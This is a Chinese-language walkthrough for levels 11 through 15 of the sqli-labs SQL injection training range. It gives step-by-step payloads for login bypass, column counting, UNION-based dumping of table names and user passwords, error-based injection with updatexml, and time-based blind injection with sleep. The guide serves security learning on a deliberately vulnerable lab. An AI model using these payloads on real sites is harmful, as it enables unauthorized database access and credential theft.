主页有sqli-labs靶场通关攻略 1-10
第十一关 less-11
步骤一:Username输入1' 有报错反应
输入 1' or 1=1 #
步骤二;查询列数
1' order by 3 #
1' order by 2#
得出列数两位
步骤三:查询数据库名
1' union select 1,2 # 有回显参数
1' union select database(),2 #
库名security
步骤四:查询表名
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#
步骤五:查询字段
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
步骤六:查询内容
1' union select 1,group_concat(id,username,password) from users#
第十二关 less-12
步骤一:Username输入1" 有报错反应
输入 1") or 1=1 #
步骤二;查询列数
1") order by 3 #
1") order by 2 #
得出列数两位
步骤三:查询数据库名
1") union select 1,2 #
1") union select database(),2 #
库名security
步骤四:查询表名
1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #
步骤五:查询字段
1") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
步骤六:查询内容
1") union select 1,group_concat(id,username,password) from users #
第十三关 less-13
步骤一:Username输入1' 有报错反应
输入 1') or 1=1 #
步骤二;查询列数
1') order by 3 #
1') order by 2 #
得出列数两位
步骤三:查询数据库名
1') union select 1,2 # 如何搜索没有结果采用报错注入
1') and updatexml(1,concat(1,(select database())),1) #
库名security
步骤四:查询表名
1') and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) #
步骤五:查询列名
1') and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #
第十四关 less-14
步骤一:Username输入1"有报错反应
输入1" or 1=1 #
步骤二;查询列数
1" order by 3 #
1" order by 2 #
得出列数两位
步骤三:查询数据库名
1"union select 1,2 # 如何搜索没有结果采用报错注入
1" and updatexml(1,concat(1,(select database())),1) #
库名security
步骤四:查询表名
1" and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) #
步骤五:查询列名
1" and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #
第十五关 less-15
步骤一:1' or 1=1 #
步骤二:时间盲注
admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit
判断数据库长度
admin' and if(length(database())=7,1,sleep(5))#&passwd=&submit=Submit
admin' and if(length(database())=8,1,sleep(5))#&passwd=&submit=Submit
最后用if函数猜数据库名